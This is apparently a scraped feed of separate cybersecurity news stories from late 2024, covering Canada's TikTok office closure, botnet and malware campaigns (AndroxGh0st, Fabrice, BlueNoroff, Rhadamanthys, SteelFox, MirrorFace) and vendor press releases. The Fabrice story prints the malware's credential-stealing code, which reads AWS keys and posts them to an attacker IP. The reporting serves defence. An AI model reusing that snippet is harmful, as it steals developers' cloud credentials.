Canada wants TikTok to dissolve its business in the country. TikTok plans to challenge the decision in court

The Government of Canada ordered the TikTok Technology Canada Inc. to close its offices in the country following a national security review.

This decision was made in accordance with the Investment Canada Act, which allows for the review of foreign investments that may be injurious to Canada’s national security. Canada’s Minister of Innovation, Science and Industry stated:

“As a result of a multi-step national security review process, which involves rigorous scrutiny by Canada’s national security and intelligence community, the Government of Canada has ordered the wind up of the Canadian business carried on by TikTok Technology Canada, Inc. The government is taking action to address the specific national security risks related to ByteDance Ltd.’s operations in Canada through the establishment of TikTok Technology Canada, Inc. The decision was based on the information and evidence collected over the course of the review and on the advice of Canada’s security and intelligence community and other government partners.”

This does not mean Canadians will no longer have access to the popular social media platform. It just means the Chinese owned company will have to close its Canadian operations located in Toronto and Vancouver.

Canada says the decision whether citizens want to use the social media platform is a personal choice but it does encourage Canadians to consult the guidance issued by Communications Security Establishment Canada’s Canadian Centre for Cyber Security to help them assess these risks.

One of the key points of their guidance is the “security over convenience” guideline, which says:

“It may be convenient to have an app always know your location or be able to fetch your photos without approval, but this isn’t the most secure option. Be aware of the features and elements of your device that can be accessed by an app, and make sure you limit permissions.”

Another one that is important in this case is the “consider where your data is being stored” guideline which reminds people to think about which nation’s laws will apply to your information and your activity on the platform.

TikTok responded that:

> “Shutting down TikTok’s Canadian offices and destroying hundreds of well-paying local jobs is not in anyone’s best interest, and today’s shutdown order will do just that. We will challenge this order in court.”

TikTok’s Chinese ownership has brought problems in other countries, as well. In April 2024, Malwarebytes Labs reported on how the US Senate approved a bill that would effectively ban TikTok from the country unless Chinese owner ByteDance gives up its share of the immensely popular app. That law is currently being challenged in court by the popular social media platform.

**We don’t just report on threats – we help protect your social media**

Cybersecurity risks should never spread beyond a headline. Protect your social media accounts by using Malwarebytes Identity Theft Protection.

 TikTok ordered to close Canada offices following &#8220;national security review&#8221; 

The threat actors behind the AndroxGh0st malware are now exploiting a broader set of security flaws impacting various internet-facing applications, while also deploying the Mozi botnet malware.
"This botnet utilizes remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructures," CloudSEK said in a

IoT Security / Vulnerability

The threat actors behind the AndroxGh0st malware are now exploiting a broader set of security flaws impacting various internet-facing applications, while also deploying the Mozi botnet malware.

"This botnet utilizes remote code execution and credential-stealing methods to maintain persistent access, leveraging unpatched vulnerabilities to infiltrate critical infrastructures," CloudSEK said in a new report.

AndroxGh0st is the name given to a Python-based cloud attack tool that's known for its targeting of Laravel applications with the goal of sensitive data pertaining to services like Amazon Web Services (AWS), SendGrid, and Twilio.

Active since at least 2022, it has previously leveraged flaws in the Apache web server (CVE-2021-41773), Laravel Framework (CVE-2018-15133), and PHPUnit (CVE-2017-9841) to gain initial access, escalate privileges, and establish persistent control over compromised systems.

Earlier this March, U.S. cybersecurity and intelligence agencies revealed that attackers are deploying the AndroxGh0st malware to create a botnet for "victim identification and exploitation in target networks."

The latest analysis from CloudSEK reveals a strategic expansion of the targeting focus, with the malware now exploiting an array of vulnerabilities for initial access -

*   CVE-2014-2120 (CVSS score: 4.3) - Cisco ASA WebVPN login page XSS vulnerability
*   CVE-2018-10561 (CVSS score: 9.8) - Dasan GPON authentication bypass vulnerability
*   CVE-2018-10562 (CVSS score: 9.8) - Dasan GPON command injection vulnerability
*   CVE-2021-26086 (CVSS score: 5.3) - Atlassian Jira path traversal vulnerability
*   CVE-2021-41277 (CVSS score: 7.5) - Metabase GeoJSON map local file inclusion vulnerability
*   CVE-2022-1040 (CVSS score: 9.8) - Sophos Firewall authentication bypass vulnerability
*   CVE-2022-21587 (CVSS score: 9.8) - Oracle E-Business Suite (EBS) Unauthenticated arbitrary file upload vulnerability
*   CVE-2023-1389 (CVSS score: 8.8) - TP-Link Archer AX21 firmware command injection vulnerability
*   CVE-2024-4577 (CVSS score: 9.8) - PHP CGI argument injection vulnerability
*   CVE-2024-36401 (CVSS score: 9.8) - GeoServer remote code execution vulnerability

"The botnet cycles through common administrative usernames and uses a consistent password pattern," the company said. "The target URL redirects to /wp-admin/, which is the backend administration dashboard for WordPress sites. If the authentication is successful, it gains access to critical website controls and settings."

The attacks have also been observed leveraging unauthenticated command execution flaws in Netgear DGN devices and Dasan GPON home routers to drop a payload named "Mozi.m" from different external servers ("200.124.241\[.\]140" and "117.215.206\[.\]216").

Mozi is another well-known botnet that has a track record of striking IoT devices to co-opt them into a malicious network for conducting distributed denial-of-service (DDoS) attacks.

While the malware authors were arrested by Chinese law enforcement officials in September 2021, a precipitous decline in Mozi activity wasn't observed until August 2023, when unidentified parties issued a kill switch command to terminate the malware. It's suspected that either the botnet creators or Chinese authorities distributed an update to dismantle it.

AndroxGh0st's integration of Mozi has raised the possibility of a possible operational alliance, thereby allowing it to propagate to more devices than ever before.

"AndroxGh0st is not just collaborating with Mozi but embedding Mozi's specific functionalities (e.g., IoT infection and propagation mechanisms) into its standard set of operations," CloudSEK said.

"This would mean that AndroxGh0st has expanded to leverage Mozi's propagation power to infect more IoT devices, using Mozi's payloads to accomplish goals that otherwise would require separate infection routines."

"If both botnets are using the same command infrastructure, it points to a high level of operational integration, possibly implying that both AndroxGh0st and Mozi are under the control of the same cybercriminal group. This shared infrastructure would streamline control over a broader range of devices, enhancing both the effectiveness and efficiency of their combined botnet operations."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

AndroxGh0st Malware Integrates Mozi Botnet to Target IoT and Cloud Services

PRESS RELEASE

Clearwater, Fla. – October 29, 2024 – According to a new AI Opportunity Report from remote connectivity and workplace digitalization solution company TeamViewer, 80% of U.S. business leaders say their organization’s AI adoption is mature, and 65% are sick of the hype and demand practical implementations of AI for their businesses. Leading from the C-suite, 81% of U.S. key decision makers currently use AI at least weekly, up from 60% last year, a notable 35% increase year-over-year. 

Most U.S. business leaders (72%) also agree that AI is vital to improving their organization’s financial outcomes. Along these lines, two-thirds (66%) agree that AI will positively affect revenue over the next year, with respondents saying that the technology makes an average of 249% revenue growth possible. Nearly a quarter of U.S. respondents (23%) believe that not implementing AI technology risks falling behind competitors and 24% foresee increased costs due to a lack of automation.

Successfully integrating AI into remote connectivity support is a prime example of how efficiencies can lead to better financial outcomes. Enter TeamViewer’s new AI-powered Session Insights.

AI-Powered Session Insights 

Aimed at helping IT teams boost efficiency and streamline operations, Session Insights is now being added to TeamViewer’s Tensor remote connectivity solution to automate session documentation and provide analytics, enabling faster handovers and smarter decision-making. By optimizing resources and capturing valuable knowledge, the new capabilities empower IT support teams to resolve issues faster, improve customer satisfaction, and scale expertise, even with limited staff.  

The new features will help internal IT teams better manage employee help desk requests and will also aid customer support teams providing remote assistance to keep their products onsite and customers up and running and aligned with uptime agreements. 

“AI adoption is growing rapidly as businesses increasingly recognize its tangible benefits in driving productivity and streamlining operations. Our research reveals that 81% of decision-makers now engage with AI at least weekly, a substantial rise from last year’s 60%. With the launch of TeamViewer’s new AI-powered Session Insights, we're enabling organizations to make smarter decisions and optimize processes while adhering to the highest security and data privacy standards. We uphold stringent encryption practices to safeguard customer data, ensuring secure processing, while also providing admins the control to enforce company-wide policies and keeping users informed every step of the way,” said Mei Dent, Chief Product and Technology Officer, TeamViewer. 

Trust, Security, Career Advancement & Equality

The report also delves into a variety of other topics gauging business leaders’ current perceptions of AI, including: 

*   Trust in AI: 50% of U.S. business leaders trust AI to act on business forecasts and make business decisions with an impressive 42% trusting AI to make decisions without human oversight.
    
*   Security: 75% of U.S. business leaders are concerned about data management in the use of AI and 67% would consider banning the use of AI outside of the IT team.
    
*   Career Advancement: 75% of U.S. business leaders believe AI is a key skill to enhance their career and 73% say AI has given them the chance to learn new skills they otherwise would not have.
    
*   The Great Equalizer: 72% of U.S. business leaders believe AI can help create equal job opportunities for parents and caregivers while 79% think AI can help increase accessibility in the workplace.
    

With 73% of U.S. respondents believing AI will drive the biggest productivity boom in a century and business leaders reporting that AI saves U.S. IT professionals approximately 16 hours per month, there is clearly huge momentum for increasing AI use in business, including TeamViewer’s AI-powered Session Insights, which integrates with Microsoft Teams and ServiceNow. More information can be found here.  

Survey Methodology 

In The AI Opportunity Report, TeamViewer uncovers the attitudes of 1,400 (500 in the U.S.) information technology, business, and operational technology decision makers towards Artificial Intelligence, across the UK, France, Germany, Australia, Singapore, and the U.S. The research was conducted online by Sapio Research in August and September 2024. 

About TeamViewer

TeamViewer is a leading global technology company that provides a connectivity platform to remotely access, control, manage, monitor, and repair devices of any kind – from laptops and mobile phones to industrial machines and robots. Although TeamViewer is free of charge for private use, it has more than 640,000 subscribers and enables companies of all sizes and from all industries to digitalize their business-critical processes through seamless connectivity. Against the backdrop of global megatrends like device proliferation, automation and new work, TeamViewer proactively shapes digital transformation and continuously innovates in the fields of Augmented Reality, Internet of Things and Artificial Intelligence. Since the company’s foundation in 2005, TeamViewer’s software has been installed on more than 2.5 billion devices around the world. The company is headquartered in Göppingen, Germany, and employs more than 1,500 people globally. In 2023, TeamViewer achieved a revenue of around EUR 627 million. TeamViewer SE (TMV) is listed at Frankfurt Stock Exchange and belongs to the MDAX. Further information can be found at www.teamviewer.com.

Business Leaders Shift to Tangible AI Results, Finds New TeamViewer Study

PRESS RELEASE

TORONTO, Oct. 30, 2024 /PRNewswire/ -- In 2024, Canadian banks have seen just 34% of the reported fraud cases they experienced a year ago. And yet, Canadian retail banking customers appear on pace to lose as much as or more than the $569 million they lost to fraud in 2023 (triple what they lost in 2021). BioCatch – the global leader in digital fraud detection and financial crime prevention powered by behavioral biometric intelligence – says these findings suggest fraudsters have altered their strategies, honing attacks to target fewer Canadians for more money per scam.

"While fraud volumes have decreased significantly over the last year, we're observing an increase in the average value of these cases," BioCatch Director of Global Fraud Intelligence Tom Peacock said. "We can attribute much of this to the rise in social engineering scams in Canada, particularly impersonation scams, which are notoriously higher value than other fraud types. More than 70% of impersonation scam losses in Canada originate from five-figure cases, greatly boosting the country's scam-loss average."

BioCatch's 2024 Digital Banking Fraud Trends in Canada report, also highlights that most Canadian fraud victims are now ages 20-49 instead of 50-89, debunking the common misconception that older people provide easier and more lucrative targets.

"Artificial Intelligence is super-charging fraud," BioCatch Global Advisory Director Seth Ruden said, "compounding its impact, and allowing bad actors to scale and sophisticate their scams with deepfakes and other devices. As the industry deploys the newest authentication methods in both account opening and account takeover processes, fraudsters will undoubtedly attack these as well."

BioCatch also found one in seven scam sessions in Canada showed signs of remote access trojans (RAT), whether active RAT (where the fraudster tricks the victim into granting them control of the session so they can execute the fraud themselves) or passive RAT (where the fraudster guides the victim through payment process).

Click here to access BioCatch's complete 2024 Digital Banking Fraud Trends in Canada report.

BioCatch fraud prevention experts Tom Peacock and Seth Ruden will hold a live conversation about the growth of social engineering scams in Canada and the other latest fraud trends in the country on Nov. 14. To register for that exclusive session, click here.

About BioCatch:

BioCatch stands at the forefront of digital fraud detection, pioneering behavioral biometric intelligence grounded in advanced cognitive science and machine learning. BioCatch analyzes thousands of user interactions to support a digital banking environment where identity, trust, and ease coexist. Today, 32 of the world's largest 100 banks and 210 total financial institutions rely on BioCatch Connect™ to combat fraud, facilitate digital transformation, and grow customer relationships. BioCatch's Client Innovation Board – an industry-led initiative featuring American Express, Barclays, Citi Ventures, HSBC, and National Australia Bank – collaborates to pioneer creative and innovative ways to leverage customer relationships for fraud prevention. With more than a decade of data analysis, 92 registered patents, and unmatched expertise, BioCatch continues to lead innovation to address future challenges. For more information, please visit www.biocatch.com.

Canadians Expected to Lose More Than $569M to Scams in 2024

Questions remain over what a corporate ban will achieve, since Canadians will still be able to use the app.

Source: SOPA Images Limited via Alamy Stock Photo

ByteDance is being exiled from Canada, though the TikTok app is not.

Following the US's example, Canada has spent recent years rubbing up against the world's most popular Chinese app. In February 2023, TikTok was banned from all government devices, citing security concerns. Later that year, the government called for a broader national security review under the 1985 Investment Canada Act, which empowers the government to scrutinize foreign investments.

In concluding that review, the minister of Innovation, Science and Economic Development Canada (ISED) — a federal agency responsible for regulating and supporting various aspects of the country's economy, industry, and scientific endeavors — unveiled a significant, though not comprehensive, development in his country's approach.

To address "specific national security risks," the minister said yesterday, the offices of TikTok Technology Canada Inc. — the Canadian subsidiary of ByteDance, TikTok's parent company — must now be shuttered. However, he noted, the government will not actually block any Canadians from using the app, as "the decision to use a social media application or platform is a personal choice."

**TikTok vs. Governments**

Ever since TikTok blew up during the COVID-19 pandemic, governments worldwide have struggled with how to administer: Ban it, to the chagrin of millions, or don't, and risk consequences to mass privacy and national security.

Concern is widespread that the Chinese Communist Party (CCP) could conduct data gathering and spying through TikTok, since it wields potentially unlimited authority over Chinese companies. And "The CCP has long been known for having an enormous capability to gather otherwise benign-looking datasets, and to process them to produce intelligence to further its national interests," notes Casey Ellis, founder and adviser at Bugcrowd. "While it can easily be argued that Western governments and companies are capable of the same, the CCP's national interests are at best competitive, and at worst disruptive to the national interests of the West."

Blocking the app to prevent CCP data gathering is controversial, however, since it's massively popular, and there is no definitive, significant proof of such malicious activity to date. A few scattered countries have done so (for varying reasons), most notably India in 2020, but most have taken up solutions somewhere in the middle.

In 2020, President Trump signed executive orders effectively forcing ByteDance to sell TikTok to an American company, or else face a national ban. President Biden's No TikTok on Government Devices Act banned the app in government settings, and his Protecting Americans from Foreign Adversary Controlled Applications Act carried the forced sale idea from the Trump administration. US policy is likely to subside now that Trump has been elected again. "Trump has made strong moves against ByteDance in the past," Ellis notes. "He has a reputation for being tough on China, and for operating on the assumption that China is competitive to the US as a great power. I think we'll see more activity around addressing 'creeping threats' from ByteDance and other Chinese companies, particularly those with a larger and established presence, both in the US and amongst its allies, over the coming year."

Meanwhile, in 2023, the Canadian government took parallel actions. And just as it had in the US, TikTok says it will challenge Canada's latest ruling in court.

**What Would Actually Solve TikTok Privacy?**

Debate has now begun over whether banning the corporate half of the TikTok operation will be helpful, if not abjectly harmful to Canada's national security aims.

As Canadian academic Michael Geist argued in a blog post, "banning the company rather than the app may actually make matters worse since the risks associated with the app will remain but the ability to hold the company accountable will be weakened," since it will no longer have a domestic presence. "It is hard to envision it prioritizing (or perhaps even complying) with Canadian regulatory processes if it is banned from formally operating in the jurisdiction."

Dark Reading has asked the ISED for its view of how the ban will benefit Canadian national security. This article will be updated when ISED's response is received.

A separate development poised to directly affect TikTok data collection in Canada is the legislation C-27, which would supersede the Personal Information Protection and Electronic Documents Act, Canada's primary privacy legislation since 2000.

C-27 packages three separate Acts: the Consumer Privacy Protection Act, the bit most relevant for TikTok user privacy; the Electronic Documents Act; and the Artificial Intelligence and Data Act. Though it may be viewed as efficient and ambitious to address so many issues at once, ongoing debates primarily around the artificial intelligence component are currently holding up the passage of the other two along with it.

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Canada Closes TikTok Offices, Citing National Security

The malicious Python package “Fabrice” on PyPI mimics the “Fabric” library to steal AWS credentials, affecting thousands. Learn how…

The malicious Python package _“Fabrice”_ on PyPI mimics the _“Fabric”_ library to steal AWS credentials, affecting thousands. Learn how it works and protect your projects with smart security practices.

Cybersecurity researchers at Socket Security have identified a malicious Python package named “Fabrice” on the Python Package Index (PyPI), which has been actively harvesting Amazon Web Services (**AWS**) credentials from unsuspecting developers for the past three years.

This package, which mimics the legitimate and widely-used “fabric” library for SSH command execution has over 202 million downloads, the malicious version has been downloaded over 37,000 times since it surfaced in 2021.

****Typosquatting****

The malicious Fabrice package is designed to exploit the trust associated with the genuine “fabric” library. This technique is called **typosquatting** in which scammers take advantage of situations in which users mistype the name of the popular “fabric” package.

The malware includes payloads that steal credentials, install backdoors, and execute additional platform-specific scripts. The scammers behind the package are particularly interested in Amazon Web Services (AWS) credentials. Currently, the attackers are targeting users and developers on Windows and Linux devices.

****Targeting Linux and Windows Devices****

On Linux, the malware creates hidden directories within the user’s home directory to store and run scripts downloaded from a remote server. These scripts are designed to hide their activity, making detection quite difficult.

On Windows, it uses VBScript to run hidden Python scripts, which in turn download malicious executables. These executables are then scheduled to run repeatedly, assuring persistence on the infected system. The malware also attempts to delete its initial entry point to cover its tracks.

****Stolen Credentials Sent to Paris****

In its **report** shared with Hackread.com ahead of publishing, both methods lead to the extraction of AWS credentials, sending them to a server located in Paris, operated by M247, a VPN service provider. This could allow attackers to abuse these credentials for unauthorized access to cloud resources. What’s worse, the campaign remains active despite researchers’ alerts to PyPI.

****Example of AWS Credential Exfiltration****

session = boto3.Session()  
cd = session.get_credentials()  
ak = cd.access_key  
sk = cd.secret_key  
data = {"k": ak, "s": sk}  
muri = "ht"+"tp"+":"+"//89.44.9.227/akkfuifkeifsa"  
requests.post(muri, json=data, timeout=4

> _“Recognizing the severe risk fabrice poses, our team has proactively reported it to the PyPI team for takedown to safeguard the broader developer community. It is still live at the time of publishing.”_
> 
> Socket Security

Rom Carmel, Co-Founder and CEO of Identity Security platform **Apono** weighed in on the latest development stating, _“_Malicious actors continue to find success by putting malicious software packages out into the developer community, playing a numbers game that a percentage of developers will make the very human mistake of choosing the wrong package for their code._“_

_“_While methods like improving security awareness education and implementing processes for secure coding can go a long way in helping developers to make more secure decisions as we see with phishing, security teams need to take steps to secure their organizations from an assumed breach approach,_“_ Rom warned.

_“_To protect your organization once credentials are compromised as we see on a near daily basis, we need to think in terms of defence in depth. That means implementing not only MFA but also reducing the blast radius from an account takeover in terms of the availability of access and the scope of privileges that attackers can use,_“_ he advised.

****Additional Security Measures for Developers****

Developers are the backbone of any project. The information that can be extracted from them can become a treasure trove if it falls into the wrong hands. Lately, **Python developers, in particular**, have been heavily targeted by threat actors. Here are some tips to protect your data and accounts from hackers and malware attacks:

*   **Stay Informed**: Keep yourself up-to-date about security advisories from platforms like PyPI. Community reports and security research blogs can be valuable in staying protected against threats like Fabrice.
*   **Double-check for typosquatting:** Always double-check the names of packages before installation. Look for signs of typosquatting like slight misspellings or unusual publisher names.
*   **Use Security Tools**: Employ tools like Socket for GitHub, which provides real-time monitoring and security checks for dependencies in your projects. Such tools can automatically detect and alert suspicious activities or known malicious packages.
*   **Regular Security Audits**: Regularly review and audit the software dependencies of your projects. Make sure that all packages are from trusted sources and serve a legitimate purpose.
*   **Follow Hackread.com:** Most importantly, follow Hackread.com.

1.  **Why is learning Python important in Data Science?**
2.  **6 official Python repositories plagued with cryptomining malware**
3.  **PythonAnywhere Cloud Platform Abused for Hosting Ransomware**
4.  **NTLM Credential Theft in Python Apps Threaten Windows Security**
5.  **Python in Threat Intelligence: Analyzing – Mitigating Cyber Threats**

Fabrice Malware on PyPI Has Been Stealing AWS Credentials for 3 Years

We have great news to share: Malwarebytes has acquired AzireVPN, a privacy-focused VPN provider.

Today I have great news to share: We’ve acquired AzireVPN, a privacy-focused VPN provider based in Sweden. 

I wanted to share with you our intentions behind this exciting step, and what this means for our existing users and the family of solutions they rely on to keep them private and secure. 

Malwarebytes has long been an advocate for user privacy (think Malwarebytes Privacy VPN and our free web extension Malwarebytes Browser Guard). Now, we’re leaning even more on our mission to reimagine consumer cybersecurity to protect devices and data, no matter where users are located, how they work and play, or the size of their wallet.  

With AzireVPN’s infrastructure and intellectual property, Malwarebytes is poised to develop more advanced VPN technologies and features, offering increased flexibility and enhanced security for our users. 

**Why AzireVPN?** 

AzireVPN is renowned for its robust security standards and privacy-first commitment. Here are two examples of what the company does to support that: 

*   AzireVPN physically owns and controls all of its dedicated and diskless servers—a practice Malwarebytes is committed to continuing.  

*   The company developed Blind Operator, a unique privacy feature implemented to completely disable both remote and local access to its servers. This creates a barrier against unauthorized modifications and traffic interception, making it virtually impossible for anyone to modify or tap the traffic on its servers and share any information about a user.  

**What does this mean for existing Malwarebytes Privacy VPN customers?** 

There are no changes for Malwarebytes Privacy VPN customers at this time. They will continue to enjoy our streamlined, integrated user experience, and our no-log service will never track, store, or share any user network data.  

**What does this mean for existing AzireVPN customers?** 

AzireVPN customers will also continue to enjoy the same privacy-focused VPN service – no logs, no data collection, no bandwidth limitations. There will continue to be no requirement to share any information to sign up for the service.   

**An exciting future is ahead of us** 

We’ll share more details on our future VPN offering in the coming months.  

I’m so excited about our future. This is yet another milestone for Malwarebytes, underscoring our commitment to privacy and a free and open internet.  

Thanks for putting your trust in us to protect you.

 Malwarebytes acquires AzireVPN to fuel additional VPN features and functionalities  

North Korean hackers are targeting cryptocurrency businesses with a sophisticated new malware campaign, dubbed “Hidden Risk.” Learn how…

North Korean hackers are targeting cryptocurrency businesses with a sophisticated new malware campaign, dubbed “Hidden Risk.” Learn how this stealthy attack works, the techniques used, and how to protect yourself from this growing threat.

North Korean state-sponsored APT group ‘**BlueNoroff**‘ is targeting crypto-related businesses in a campaign dubbed ‘Hidden Risk’, according to SentinelOne’s findings shared with Hackread.com. 

SentinelLabs’ threat researchers reportedly discovered that BlueNoroff, a subgroup of the larger North Korean state-backed **Lazarus Group**, is targeting cryptocurrency and DeFi businesses using use email and PDF-based lures with fake news headlines/crypto-related stories in a campaign that began in July 2024.

Examples of fake news, posts and announcements used in the attack (Via SentinelOne)

****Analyzing the Attack****

Researchers noted that attackers have employed unique tactics to evade detection and compromise victim systems. The attack begins with a **well-crafted phishing email** that lures unsuspecting victims into clicking on a malicious link that leads to a seemingly legitimate PDF document, which is actually hiding a malicious Swift-language-based Mac application cleverly disguised as a PDF reader (signed/notarized on 19 October 2024).

“The application is disguised as a link to a PDF document relating to a cryptocurrency topic such as “Hidden Risk Behind New Surge of Bitcoin Price”, “Altcoin Season 2.0-The Hidden Gems to Watch” and “New Era for Stablecoins and DeFi, CeFi”,” researchers **explained**.

Once executed, this application discreetly downloads a decoy PDF (Hidden Risk) and then downloads/executes a malicious x86-64 binary (“growth”) on both Intel and Apple silicon machines. 

Growth installs itself persistently and acts as a backdoor. It gathers sensitive information about the infected system, communicates with a remote server controlled by the attackers, and can potentially receive and execute commands.

****Persistence Mechanism****

To ensure persistence, the attackers have opted for a unique method of modifying the Zsh configuration file (zshenv) by adding malicious code to ensure its continued presence. This is a critical file used by the Zsh shell and is sourced during every Zsh session, allowing the backdoor to automatically execute upon system startup, even after a reboot.

****The BlueNoroff Connection****

SentinelLabs’ researchers have linked this campaign with BlueNoroff because it resembles techniques from their past campaigns, including parsing server commands and saving them in hidden files. The campaign’s network infrastructure analysis also reveals connections to domains used in previous campaigns using services like **NameCheap** and Quickpacket for hosting.

Furthermore, the malware uses a User-Agent string previously linked to BlueNoroff’s “**RustBucket**” malware and exploits a developer account to get their malware notarized by Apple, bypassing security measures like **Gatekeeper**.

****Staying Protected****

BlueNoroff has a history of targeting cryptocurrency exchanges, venture capital firms, and banks and poses a constant threat to the industry. They prefer using PDF-based lures mainly because PDF documents are widely used and trusted, making them ideal for malicious payloads.

Hackread recently **reported** BlueNoroff-linked malware, TodoSwift, disguised as a legitimate PDF viewer and ObjCShellz malware **targeting macOS** to run remote shell commands on Intel and Arm Macs.

Therefore, it is important to double-check email addresses, watch out for emails from anonymous sources, and avoid clicking on links in unknown emails, especially if they ask for downloading applications/PDFs. MacOS users must remain aware of risks given the sudden rise in **macOS-oriented attacks**.

1.  **Fake North Korean IT Workers Infiltrate Western Firms**
2.  **North Korean Hackers Team Up with Play Ransomware**
3.  **N Korean hackers stole $1.7 billion from crypto exchanges**
4.  **North Korean Hackers Drop Linux Malware for ATM Cashouts**
5.  **SnatchCrypto attack hits DeFi, Blockchain Firms with backdoor**

North Korean Hackers Use Fake News to Spread ‘Hidden Risk’ Malware

An ongoing phishing campaign is employing copyright infringement-related themes to trick victims into downloading a newer version of the Rhadamanthys information stealer since July 2024.
Cybersecurity firm Check Point is tracking the large-scale campaign under the name CopyRh(ight)adamantys. Targeted regions include the United States, Europe, East Asia, and South America.
"The campaign

An ongoing phishing campaign is employing copyright infringement-related themes to trick victims into downloading a newer version of the Rhadamanthys information stealer since July 2024.

Cybersecurity firm Check Point is tracking the large-scale campaign under the name **CopyRh(ight)adamantys**. Targeted regions include the United States, Europe, East Asia, and South America.

"The campaign impersonates dozens of companies, while each email is sent to a specific targeted entity from a different Gmail account, adapting the impersonated company and the language per targeted entity," the company said in a technical analysis. "Almost 70% of the impersonated companies are from the Entertainment /Media and Technology/Software sectors."

The attacks are notable for the deployment of version 0.7 of the Rhadamanthys stealer, which, as detailed by Recorded Future's Insikt Group early last month, incorporates artificial intelligence (AI) for optical character recognition (OCR).

The Israeli company said the activity overlaps with a campaign that Cisco Talos disclosed last week as targeting Facebook business and advertising account users in Taiwan to deliver Lumma or Rhadamanthys stealer malware.

The attack chains are characterized by the use of spear-phishing tactics that entail sending email messages claiming purported copyright violations by masquerading as well-known companies.

These emails are sent from Gmail accounts and claim to be from legal representatives of the impersonated companies. The contents of the message accuse the recipients of misusing their brand on social media platforms and request them to remove the concerned images and videos.

"The removal instructions are said to be in a password-protected file. However, the attached file is a download link to appspot.com, linked to the Gmail account, which redirects the user to Dropbox or Discord to download a password-protected archive (with the password provided in the email)," Check Point said.

The RAR archive contains three components, a legitimate executable vulnerable to DLL side-loading, the malicious DLL containing the stealer payload, and a decoy document. Once the binary is run, it sideloads the DLL file, which then paves the way for the deployment of Rhadamanthys.

Check Point, which attributed the campaign to a likely cybercrime group, said that it's possible the threat actors have utilized AI tools given the scale of the campaign and the variety of the lures and sender emails.

"The campaign's widespread and indiscriminate targeting of organizations across multiple regions suggests it was orchestrated by a financially motivated cybercrime group rather than a nation-state actor," it said. "Its global reach, automated phishing tactics, and diverse lures demonstrate how attackers continuously evolve to improve their success rates."

**New SteelFox Malware Exploits Vulnerable Driver**

The findings come as Kaspersky shed light on a new "full-featured crimeware bundle" dubbed SteelFox that's propagated via forums posts, torrent trackers, and blogs, passing off as legitimate utilities like Foxit PDF Editor, JetBrains, and AutoCAD.

The campaign, dating back to February 2023, has claimed victims across the world, particularly those located in Brazil, China, Russia, Mexico, UAE, Egypt, Algeria, Vietnam, India, and Sri Lanka. It has not been attributed to any known threat actor or group.

"Delivered via sophisticated execution chains including shellcoding, this threat abuses Windows services and drivers," security researcher Kirill Korchemny said. "It also uses stealer malware to extract the victim's credit card data as well as details about the infected device."

The starting point is a dropper app that impersonates cracked versions of popular software, which, when executed, asks for administrator access and drops a next-stage loader that, in turn, establishes persistence and launches the SteelFox DLL.

The admin access is subsequently abused to create a service that runs an older version of WinRing0.sys, a hardware access library for Windows that's vulnerable to CVE-2020-14979 and CVE-2021-41285, thereby allowing the threat actor to obtain NT\\SYSTEM privileges.

"This driver is also a component of the XMRig miner, so it is utilized for mining purposes," Korchemny noted. "After initializing the driver, the sample launches the miner. This represents a modified executable of XMRig with junk code fillers. It connects to a mining pool with hardcoded credentials."

The miner, for its part, is downloaded from a GitHub repository, with the malware also initiating contact with a remote server over TLS version 1.3 to exfiltrate sensitive data from web browsers, such as cookies, credit card data, browsing history, and visited places, system metadata, installed software, and timezone, among others.

"Highly sophisticated usage of modern C++ combined with external libraries grant this malware formidable power," Kaspersky said. "Usage of TLSv1.3 and SSL pinning ensures secure communication and harvesting of sensitive data."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

SteelFox and Rhadamanthys Malware Use Copyright Scams, Driver Exploits to Target Victims

The China-aligned threat actor known as MirrorFace has been observed targeting a diplomatic organization in the European Union, marking the first time the hacking crew has targeted an organization in the region.
"During this attack, the threat actor used as a lure the upcoming World Expo, which will be held in 2025 in Osaka, Japan," ESET said in its APT Activity Report for the period April to

Threat Intelligence / Cyber Espionage

The China-aligned threat actor known as MirrorFace has been observed targeting a diplomatic organization in the European Union, marking the first time the hacking crew has targeted an entity in the region.

"During this attack, the threat actor used as a lure the upcoming World Expo, which will be held in 2025 in Osaka, Japan," ESET said in its APT Activity Report for the period April to September 2024.

"This shows that even considering this new geographic targeting, MirrorFace remains focused on Japan and events related to it."

MirrorFace, also tracked as Earth Kasha, is assessed to be part of an umbrella group known as APT10, which also comprises clusters tracked as Earth Tengshe and Bronze Starlight. It's known for its targeting of Japanese organizations at least since 2019, although a new campaign observed in early 2023 expanded its operations to include Taiwan and India.

Over the years, the hacking crew's malware arsenal has evolved to include backdoors such as ANEL (aka UPPERCUT), LODEINFO and NOOPDOOR (aka HiddenFace), as well as a credential stealer referred to as MirrorStealer.

In the latest attack detected by the Slovak cybersecurity company, the victim was sent a spear-phishing email containing a link to a ZIP archive ("The EXPO Exhibition in Japan in 2025.zip") hosted on Microsoft OneDrive.

Image Source: Trend Micro

The archive file included a Windows shortcut file ("The EXPO Exhibition in Japan in 2025.docx.lnk") that, when launched, triggered an infection sequence that ultimately deployed ANEL and NOOPDOOR.

"ANEL disappeared from the scene around the end of 2018 or the start of 2019, and it was believed that LODEINFO had succeeded it, appearing later in 2019," ESET said. "Therefore, it is interesting to see ANEL resurfacing after almost five years."

The development comes as threat actors affiliated with China, like Flax Typhoon, Granite Typhoon, and Webworm, have been found to be increasingly relying on the open-source and multi-platform SoftEther VPN to maintain access to victims' networks.

It also follows a report from Bloomberg that said the China-linked Volt Typhoon breached Singapore Telecommunications (Singtel) as a "test run" as part of a broader campaign targeting telecom companies and other critical infrastructure, citing two people familiar with the matter. The cyber intrusion was discovered in June 2024.

Telecommunication and network service providers in the U.S. like AT&T, Verizon, and Lumen Technologies have also become the target of another Chinese nation-state adversarial collective called Salt Typhoon (aka FamousSparrow and GhostEmperor).

Earlier this week, The Wall Street Journal said the hackers leveraged these attacks to compromise cellphone lines used by various senior national security, policy officials, and politicians in the U.S. The campaign is also alleged to have infiltrated communications providers belonging to another country that "closely shares intelligence with the U.S."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#intel